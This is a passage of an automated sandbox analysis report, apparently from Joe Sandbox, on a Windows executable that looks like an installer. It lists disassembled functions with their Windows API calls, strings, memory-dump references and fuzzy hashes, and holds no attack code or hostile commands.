                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: be4fb59b900ee74e718d87cdc4fcd1eef43a9c564c0a5ec1af3f625bb6e6dd39
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 12F0AF31300110DBCB10EB9AD885B6F6299DB9931AF50503BF981DB293E73CCC168629
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00483BC4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 39registryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                                                                                                                                                                  • RegQueryValueExA.ADVAPI32(?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 00483C05
                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 00483C28
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • CSDVersion, xrefs: 00483BFC
                                                                                                                                                                                                                                  • System\CurrentControlSet\Control\Windows, xrefs: 00483BD2
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseOpenQueryValue
                                                                                                                                                                                                                                  • String ID: CSDVersion$System\CurrentControlSet\Control\Windows
                                                                                                                                                                                                                                  • API String ID: 3677997916-1910633163
                                                                                                                                                                                                                                  • Opcode ID: 33fca6af7241f4b653fe53c350a6e88c669f1de2ef3da1c7a1752152dae0c121
                                                                                                                                                                                                                                  • Instruction ID: 1d850e848a14c5c59b8e95f13e5f63a8fb365af486cc5d6c9f9b701d22fca986
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 33fca6af7241f4b653fe53c350a6e88c669f1de2ef3da1c7a1752152dae0c121
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 56F03176E40208A6DF10EAD48C45BAFB3BCAB14B05F104967EA10F7280E678AB048B59
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0042D8F0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemWow64DirectoryA,?,00453B5A,00000000,00453BFD,?,?,00000000,00000000,00000000,00000000,00000000,?,00453FED,00000000), ref: 0042D90A
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042D910
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                                  • String ID: GetSystemWow64DirectoryA$kernel32.dll
                                                                                                                                                                                                                                  • API String ID: 1646373207-4063490227
                                                                                                                                                                                                                                  • Opcode ID: 3965e48138ab8598cb17ff311cd558fd433aca8a834515e354a81fb776e31baf
                                                                                                                                                                                                                                  • Instruction ID: 657275fb9dfacbe144619f02b172540cf2f0c5a6f4252bec6bd03a25d2dd35a2
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3965e48138ab8598cb17ff311cd558fd433aca8a834515e354a81fb776e31baf
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A5E0DFE0B40B0122D70032BA1C82B6B108D4B84728F90053B3894E62D6DDBCD9840A6D
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0042EB54 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23libraryloaderCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(user32.dll,ShutdownBlockReasonDestroy,?,00000000,0042EAD0), ref: 0042EB62
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EB68
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                                  • String ID: ShutdownBlockReasonDestroy$user32.dll
                                                                                                                                                                                                                                  • API String ID: 1646373207-260599015
                                                                                                                                                                                                                                  • Opcode ID: 88ce12e330a2fc51ece58c284b54de3a76b504cb94a4c995bd1a3fb2c6ea0693
                                                                                                                                                                                                                                  • Instruction ID: e1ec077e445c8734ae54db5ffdd633522f5c412f0b7fee52e54de0d29bb4c321
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 88ce12e330a2fc51ece58c284b54de3a76b504cb94a4c995bd1a3fb2c6ea0693
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A2D0C793311732665D10B1F73CD1EAB058C891527935404B7F515E5641D55DEC1115AD
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0044F744 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,00498BF2), ref: 0044F77F
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044F785
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                                  • String ID: NotifyWinEvent$user32.dll
                                                                                                                                                                                                                                  • API String ID: 1646373207-597752486
                                                                                                                                                                                                                                  • Opcode ID: f97c3de5cacafbf63d36e16939e29d51eb7e912e87a0fb2b79f6fc39cd446e20
                                                                                                                                                                                                                                  • Instruction ID: 5e946f17392c81a4f172a46fe169fb9a1f72c9003761a5edf28bd31acc2f1150
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f97c3de5cacafbf63d36e16939e29d51eb7e912e87a0fb2b79f6fc39cd446e20
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 59E012F0E417049AFF00BBB57B86B1A3A90E764719B00057FF414A6292DB7C481C4F9D
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00498968 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9libraryloaderCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,00498C48,00000001,00000000,00498C6C), ref: 00498972
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00498978
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                                  • String ID: DisableProcessWindowsGhosting$user32.dll
                                                                                                                                                                                                                                  • API String ID: 1646373207-834958232
                                                                                                                                                                                                                                  • Opcode ID: 71af8591fbce5d4533a7188bae6238bebf63b2f5996384562a89c67780edd1c3
                                                                                                                                                                                                                                  • Instruction ID: 34f838485a85c0df890c3e192e44216071158a5cea444d63bbc0a0b2480586ef
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 71af8591fbce5d4533a7188bae6238bebf63b2f5996384562a89c67780edd1c3
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 22B002C0651707589D5032FA0D06B3F48484C5276D728057F3414A51C6DD6C89115D3F
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 004645F4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 8libraryloaderCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0044B658: LoadLibraryA.KERNEL32(uxtheme.dll,?,0044F775,00498BF2), ref: 0044B67F
                                                                                                                                                                                                                                    • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044B697
                                                                                                                                                                                                                                    • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044B6A9
                                                                                                                                                                                                                                    • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044B6BB
                                                                                                                                                                                                                                    • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044B6CD
                                                                                                                                                                                                                                    • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6DF
                                                                                                                                                                                                                                    • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6F1
                                                                                                                                                                                                                                    • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044B703
                                                                                                                                                                                                                                    • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044B715
                                                                                                                                                                                                                                    • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044B727
                                                                                                                                                                                                                                    • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044B739
                                                                                                                                                                                                                                    • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044B74B
                                                                                                                                                                                                                                    • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044B75D
                                                                                                                                                                                                                                    • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044B76F
                                                                                                                                                                                                                                    • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044B781
                                                                                                                                                                                                                                    • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044B793
                                                                                                                                                                                                                                    • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044B7A5
                                                                                                                                                                                                                                    • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044B7B7
                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,00498C1A), ref: 00464603
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00464609
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                                                  • String ID: SHPathPrepareForWriteA$shell32.dll
                                                                                                                                                                                                                                  • API String ID: 2238633743-2683653824
                                                                                                                                                                                                                                  • Opcode ID: edc6f8ec64a36a5908760ff58e990ea99ea877eb638915fc896b3384d426fa6b
                                                                                                                                                                                                                                  • Instruction ID: ed4894befccbfeda2ad80f7d1b9e1cb4df1a551eae9986247d0c145e26b1cd95
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: edc6f8ec64a36a5908760ff58e990ea99ea877eb638915fc896b3384d426fa6b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DDB092D0A82740A4C90077F2985B90F2A4488A271EB10153B710476483EABC84100EAE
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0047D67C Relevance: 6.2, APIs: 4, Instructions: 195fileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • FindNextFileA.KERNEL32(000000FF,?,00000000,0047D7F0,?,?,?,?,00000000,0047D945,?,?,?,00000000,?,0047DA54), ref: 0047D7CC
                                                                                                                                                                                                                                  • FindClose.KERNEL32(000000FF,0047D7F7,0047D7F0,?,?,?,?,00000000,0047D945,?,?,?,00000000,?,0047DA54,00000000), ref: 0047D7EA
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Find$CloseFileNext
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2066263336-0
                                                                                                                                                                                                                                  • Opcode ID: df8c12b404288ac1cc0f16a4307cfa19f630790b74cd409a531bdd723e619500
                                                                                                                                                                                                                                  • Instruction ID: 2ce97de6e4eb512f8d4c2eb376340b964b0e691095a652a34be041e4083b4e02
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: df8c12b404288ac1cc0f16a4307cfa19f630790b74cd409a531bdd723e619500
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 07813A74D0024D9FCF11EFA5CC91ADFBBB8EF49304F5080AAE908A7291D6399A46CF54
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 004755AC Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 114COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0042EE30: GetTickCount.KERNEL32 ref: 0042EE36
                                                                                                                                                                                                                                    • Part of subcall function 0042EC88: MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 0042ECBD
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(00000000,00475721,?,?,0049C1E0,00000000), ref: 0047560A
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CountErrorFileLastMoveTick
                                                                                                                                                                                                                                  • String ID: $LoggedMsgBox returned an unexpected value. Assuming Cancel.$MoveFileEx
                                                                                                                                                                                                                                  • API String ID: 2406187244-2685451598
                                                                                                                                                                                                                                  • Opcode ID: b4e541c37b522712e9a51433fba2d6f7c47cca6c6c5b44fd3a0118cd85a505a9
                                                                                                                                                                                                                                  • Instruction ID: cfe7f312216358cbd0971b398f0cafde252de4893b1317a5ce8d70824cf78b76
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b4e541c37b522712e9a51433fba2d6f7c47cca6c6c5b44fd3a0118cd85a505a9
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4D418570A006099BDB10EFA5D882AEF77B5FF48314F508537E408BB395D7789A058BA9
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00413CF8 Relevance: 6.1, APIs: 4, Instructions: 107COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetDesktopWindow.USER32 ref: 00413D46
                                                                                                                                                                                                                                  • GetDesktopWindow.USER32 ref: 00413DFE
                                                                                                                                                                                                                                    • Part of subcall function 00418EC0: 6F5BC6F0.COMCTL32(?,00000000,00413FC3,00000000,004140D3,?,?,0049B628), ref: 00418EDC
                                                                                                                                                                                                                                    • Part of subcall function 00418EC0: ShowCursor.USER32(00000001,?,00000000,00413FC3,00000000,004140D3,?,?,0049B628), ref: 00418EF9
                                                                                                                                                                                                                                  • SetCursor.USER32(00000000,?,?,?,?,00413AF3,00000000,00413B06), ref: 00413E3C
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CursorDesktopWindow$Show
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2074268717-0
                                                                                                                                                                                                                                  • Opcode ID: 48e3412c1a46991eea637d4b1b247886da5b7466a2ee9d80c19fa9edf3c8b710
                                                                                                                                                                                                                                  • Instruction ID: d0219f8535474b9b7e790bb207accfb6dce16a9ac66decbe361331da1304c66b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 48e3412c1a46991eea637d4b1b247886da5b7466a2ee9d80c19fa9edf3c8b710
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 91412C75600210AFC710DF2AFA84B56B7E1EB65329B16817BE405CB365DB38DD81CF98
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00408A54 Relevance: 6.1, APIs: 4, Instructions: 95windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetModuleFileNameA.KERNEL32(00400000,?,00000100), ref: 00408A75
                                                                                                                                                                                                                                  • LoadStringA.USER32(00400000,0000FF9E,?,00000040), ref: 00408AE4
                                                                                                                                                                                                                                  • LoadStringA.USER32(00400000,0000FF9F,?,00000040), ref: 00408B7F
                                                                                                                                                                                                                                  • MessageBoxA.USER32(00000000,?,?,00002010), ref: 00408BBE
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: LoadString$FileMessageModuleName
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 704749118-0
                                                                                                                                                                                                                                  • Opcode ID: ede814ba8b2c905ab74f80468cae56b5ab65d73ed59c96bbcc76a4520df8398d
                                                                                                                                                                                                                                  • Instruction ID: 7d65b0a5aa49ad722f3f3263bbe29e3330acee4661d9e2153cfe083702b22da2
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ede814ba8b2c905ab74f80468cae56b5ab65d73ed59c96bbcc76a4520df8398d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1F3123716083849AD370EB65C945BDF77D89B85704F40483FB6C8E72D1EB7859048B6B
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0044E8C4 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SendMessageA.USER32(00000000,000001A1,?,00000000), ref: 0044E90D
                                                                                                                                                                                                                                    • Part of subcall function 0044CF50: SendMessageA.USER32(00000000,000001A0,?,00000000), ref: 0044CF82
                                                                                                                                                                                                                                  • InvalidateRect.USER32(00000000,00000000,00000001,00000000,000001A1,?,00000000), ref: 0044E991
                                                                                                                                                                                                                                    • Part of subcall function 0042BBB4: SendMessageA.USER32(00000000,0000018E,00000000,00000000), ref: 0042BBC8
                                                                                                                                                                                                                                  • IsRectEmpty.USER32(?), ref: 0044E953
                                                                                                                                                                                                                                  • ScrollWindowEx.USER32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000006), ref: 0044E976
                                                                                                                                                                                                                                  Memory Dump Source
